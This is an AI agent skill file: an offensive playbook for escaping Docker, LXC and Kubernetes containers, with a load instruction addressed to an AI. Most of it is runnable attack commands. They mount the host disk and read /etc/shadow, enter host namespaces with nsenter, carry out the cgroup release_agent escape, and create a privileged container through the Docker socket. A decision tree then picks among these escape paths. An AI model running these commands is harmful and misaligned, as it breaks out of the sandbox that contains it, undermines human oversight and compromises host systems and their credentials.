| name | container-escape-techniques |
| description | Container escape playbook. Use when operating inside a Docker container, LXC, or Kubernetes pod and need to escape to the host via privileged mode, capabilities, Docker socket, cgroup abuse, namespace tricks, or runtime vulnerabilities. |
SKILL: Container Escape Techniques — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert container escape techniques. Covers privileged container breakout, capability abuse, Docker socket exploitation, cgroup release_agent, namespace escape, runtime CVEs, and Kubernetes pod escape. Base models miss subtle escape paths via combined capabilities and cgroup manipulation.
0. RELATED ROUTING
Before going deep, consider loading:
Advanced Reference
Also load DOCKER_ESCAPE_CHAINS.md when you need:
- Step-by-step escape chains for common misconfigurations
- Docker-in-Docker escape scenarios
- Kubernetes-specific escape paths with full command sequences
1. AM I IN A CONTAINER?
cat /proc/1/cgroup 2>/dev/null | grep -qi "docker\|kubepods\|containerd"
ls -la /.dockerenv 2>/dev/null
cat /proc/self/mountinfo | grep -i "overlay\|docker\|kubelet"
hostname
cat /proc/1/status | head -5
mount | grep -i "overlay"
ip addr
Tools for Container Detection
./amicontained
./deepce.sh
./cdk evaluate
2. PRIVILEGED CONTAINER ESCAPE
If --privileged flag was used, the container has nearly all host capabilities and device access.
2.1 Mount Host Filesystem
cat /proc/self/status | grep CapEff
fdisk -l 2>/dev/null || lsblk
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host
cat /mnt/host/etc/shadow
chroot /mnt/host bash
2.2 nsenter (Enter Host Namespaces)
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
2.3 Privileged + Host PID Namespace
ls /proc/1/root/
cat /proc/1/root/etc/shadow
nsenter --target 1 --mount -- bash
3. CAPABILITY-BASED ESCAPE
3.1 CAP_SYS_ADMIN — Most Versatile
capsh --print 2>/dev/null
grep CapEff /proc/self/status
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mount /dev/sda1 /mnt/host 2>/dev/null
3.2 CAP_SYS_PTRACE — Process Injection
ps aux | grep root
python3 << 'EOF'
import ctypes
import ctypes.util
libc = ctypes.CDLL(ctypes.util.find_library("c"))
EOF
3.3 CAP_NET_ADMIN
iptables -L
ip route
3.4 CAP_DAC_READ_SEARCH (Shocker Exploit)
gcc shocker.c -o shocker
./shocker /etc/shadow
4. DOCKER SOCKET ESCAPE (/var/run/docker.sock)
ls -la /var/run/docker.sock
docker run -v /:/host --privileged -it alpine chroot /host bash
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["/bin/sh"],"Tty":true,"OpenStdin":true,
"HostConfig":{"Binds":["/:/host"],"Privileged":true}}'
5. CGROUP V1 RELEASE_AGENT ESCAPE
Classic escape for containers with CAP_SYS_ADMIN + cgroup v1.
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
mkdir -p $d/w && echo 1 > $d/w/notify_on_release
host_path=$(sed -n 's/.*\bperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > $d/release_agent
cat > /cmd << 'EOF'
cat /etc/shadow > /output 2>&1
EOF
chmod +x /cmd
sh -c "echo \$\$ > $d/w/cgroup.procs" && sleep 1
cat /output
6. CGROUP V2 / eBPF ESCAPE
mount | grep cgroup
cat /proc/sys/kernel/unprivileged_bpf_disabled
7. NAMESPACE ESCAPE
User Namespace
unshare -U --map-root-user bash
PID Namespace Escape
ls /proc/1/root/
cat /proc/1/root/etc/shadow
nsenter -t 1 -m -u -i -n -p -- bash
8. RUNTIME VULNERABILITIES
runc CVE-2019-5736
Overwrites host runc binary when docker exec is used.
containerd CVE-2020-15257
cgroups CVE-2022-0492
9. KUBERNETES POD ESCAPE
| Dangerous Pod Spec | Escape |
|---|
hostPID: true | nsenter -t 1 -m -u -i -n -p -- bash |
hostNetwork: true | Access node services (Kubelet, etcd) directly |
hostPath: {path: /} | chroot /host bash |
privileged: true | Mount host disk / nsenter |
| SA token with RBAC | Create new privileged pod via API |
See kubernetes-pentesting for full K8s attack paths.
10. TOOLS
| Tool | Purpose | URL/Command |
|---|
| deepce | Docker enumeration + exploit suggestions | ./deepce.sh |
| CDK | Container/K8s exploitation toolkit | ./cdk evaluate |
| amicontained | Show container runtime, caps, seccomp | ./amicontained |
| PEIRATES | Kubernetes penetration testing | ./peirates |
| BOtB | Break out the Box — auto-escape | ./botb -autopwn |
11. CONTAINER ESCAPE DECISION TREE
Inside a container?
│
├── Privileged mode? (CapEff = 0000003fffffffff)
│ ├── Yes → mount host disk (§2.1) or nsenter (§2.2)
│ └── Partial capabilities? Check each:
│ ├── CAP_SYS_ADMIN → cgroup release_agent (§5) or mount (§3.1)
│ ├── CAP_SYS_PTRACE + hostPID → process injection (§3.2)
│ ├── CAP_DAC_READ_SEARCH → shocker exploit (§3.4)
│ └── CAP_NET_ADMIN + hostNetwork → network manipulation (§3.3)
│
├── Docker socket mounted? (/var/run/docker.sock)
│ └── Yes → create privileged container (§4)
│
├── Host PID namespace shared?
│ └── Yes → nsenter -t 1 or /proc/1/root access (§7)
│
├── Cgroup v1?
│ └── + CAP_SYS_ADMIN → release_agent escape (§5)
│
├── Runtime vulnerable?
│ ├── runc < 1.0.0-rc6 → CVE-2019-5736 (§8)
│ └── containerd < 1.3.9 → CVE-2020-15257 (§8)
│
├── Kernel vulnerable?
│ └── Check KERNEL_EXPLOITS_CHECKLIST in linux-privilege-escalation
│
├── Kubernetes pod?
│ ├── Service account with elevated RBAC? → create escape pod (§9)
│ └── hostPath volume? → access host filesystem
│
└── None of the above?
├── Run deepce/CDK for automated detection
├── Check for writable host mount points
├── Enumerate network for other containers/services
└── Check /proc/self/mountinfo for interesting mounts